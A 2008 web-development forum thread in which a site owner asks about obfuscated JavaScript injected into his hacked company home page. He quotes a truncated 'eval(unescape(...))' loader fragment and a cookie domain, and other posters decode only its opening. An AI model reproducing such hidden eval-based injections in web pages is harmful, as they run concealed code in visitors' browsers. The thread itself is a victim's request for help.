Strange behaviour

J

John Clayton

Looking at my company home page, I get asked if it can set a cookie.
I've never , ever included these devices on either of the sites I've built.
Looking at the source code there is some stuff in comments I never put in
there.
I'll remove it in next day or so, but before I do can any one please tell me
what it might be?

Our hosting company (Netcetera) has just yesterday altered ftp access codes
for both sites as part of their "security review".
Seems to me this one's been hacked into.
Can anyone guess to what purpose please?
Many thanks.

The code is just after <body bgcolor= , which is now repeated - as is this
"cuckoo code". this starts off "var msg=314, d=document

This page is;- www.ossettmouldings.com/default.htm

I've only looked at one or two others - they seem OK.

John
 
V

Vince Morgan

John Clayton said:
Looking at my company home page, I get asked if it can set a cookie.
I've never , ever included these devices on either of the sites I've built.
Looking at the source code there is some stuff in comments I never put in
there.
I'll remove it in next day or so, but before I do can any one please tell me
what it might be?

Our hosting company (Netcetera) has just yesterday altered ftp access codes
for both sites as part of their "security review".
Seems to me this one's been hacked into.
Can anyone guess to what purpose please?
Many thanks.

The code is just after <body bgcolor= , which is now repeated - as is this
"cuckoo code". this starts off "var msg=314, d=document

This page is;- www.ossettmouldings.com/default.htm
Click to expand...

I don't think anyone here is going to be in a hurry to open this page.
Looks like they've added a little javascript. Posting the offending code
would be better.
Vince
 
N

Neredbojias

Well bust mah britches and call me cheeky, on Sun, 06 Jan 2008 23:47:11
GMT John Clayton scribed:
Looking at my company home page, I get asked if it can set a cookie.
I've never , ever included these devices on either of the sites I've
built. Looking at the source code there is some stuff in comments I
never put in there.
I'll remove it in next day or so, but before I do can any one please
tell me what it might be?

Our hosting company (Netcetera) has just yesterday altered ftp access
codes for both sites as part of their "security review".
Seems to me this one's been hacked into.
Can anyone guess to what purpose please?
Many thanks.

The code is just after <body bgcolor= , which is now repeated - as is
this "cuckoo code". this starts off "var msg=314, d=document

This page is;- www.ossettmouldings.com/default.htm

I've only looked at one or two others - they seem OK.
Click to expand...

Dunno, but whatever it's theoretically suppose to do fails, anyway (-on a
secure receiver.)

58 html errors! That you or the hacker? I noticed <html> _before_ the
doctype, among other things. -And 2 opening body tags... Tsk, tsk.
 
J

John Clayton

I don't think anyone here is going to be in a hurry to open this page.
Looks like they've added a little javascript. Posting the offending code
would be better.
Vince
Click to expand...
Vince,
As you say, it looks to me also like a bit of script. It reads;-

<!--
var msg=314,d=document;
eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
continues for absolutely ages and concludes with ;))
//-->

The "cookie" appears to originate from ;- tanikinata.cn

I'm just wondering what it's doiong/ attempting to do?
 
J

Jonathan N. Little

John said:
Vince,
As you say, it looks to me also like a bit of script. It reads;-

<!--
var msg=314,d=document;
eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
continues for absolutely ages and concludes with ;))
//-->
Click to expand...

Well the first part translates "window.status='D"
The "cookie" appears to originate from ;- tanikinata.cn

I'm just wondering what it's doiong/ attempting to do?
Click to expand...

Something *not* good. If they have to hide it there is a reason....
 
V

Vince Morgan

John Clayton said:
Vince,
As you say, it looks to me also like a bit of script. It reads;-

<!--
var msg=314,d=document;
eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
continues for absolutely ages and concludes with ;))
//-->

The "cookie" appears to originate from ;- tanikinata.cn

I'm just wondering what it's doiong/ attempting to do?
Click to expand...
There isn't anyway of knowing what it was meant to achieve John without
seeing all the code.
Jonathan nailed the first line, but without the rest would be a shot in the
dark.
Vince
 
J

John Clayton

Neredbojias said:
Well bust mah britches and call me cheeky, on Sun, 06 Jan 2008 23:47:11
GMT John Clayton scribed:
Click to expand...

Thank you for your observations and advice people, Vince, Johnathan and
Neredbojias. I've taken the "cuckoo" js script out the back and shot it
dead - now we may never discover it's purpose in life.
I'll tidy up me html one day - ta.

John
"Live long and prosper"
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Localhost 0
Beginner's Guide to getting CipherSweet working with PDO and MYSQL 1
Help figuring out a directory permission change problem 1
raw_input(), STRANGE behaviour 8
GridView / ButtonType - Strange behaviour. 0
Problem with a login script, SESSION user rights and put this together so it works with the other pages and MySQL. Code examples. 2
Working on mobile css menu with plenty of frustration! 2
IE8 WebService Behaviour Issue 4

Members online

No members online now.
Total: 29 (members: 0, guests: 29)
Robots: 507

Forum statistics

Threads
473,769
Messages
2,569,579
Members
45,053
Latest member
BrodieSola

Latest Threads

Top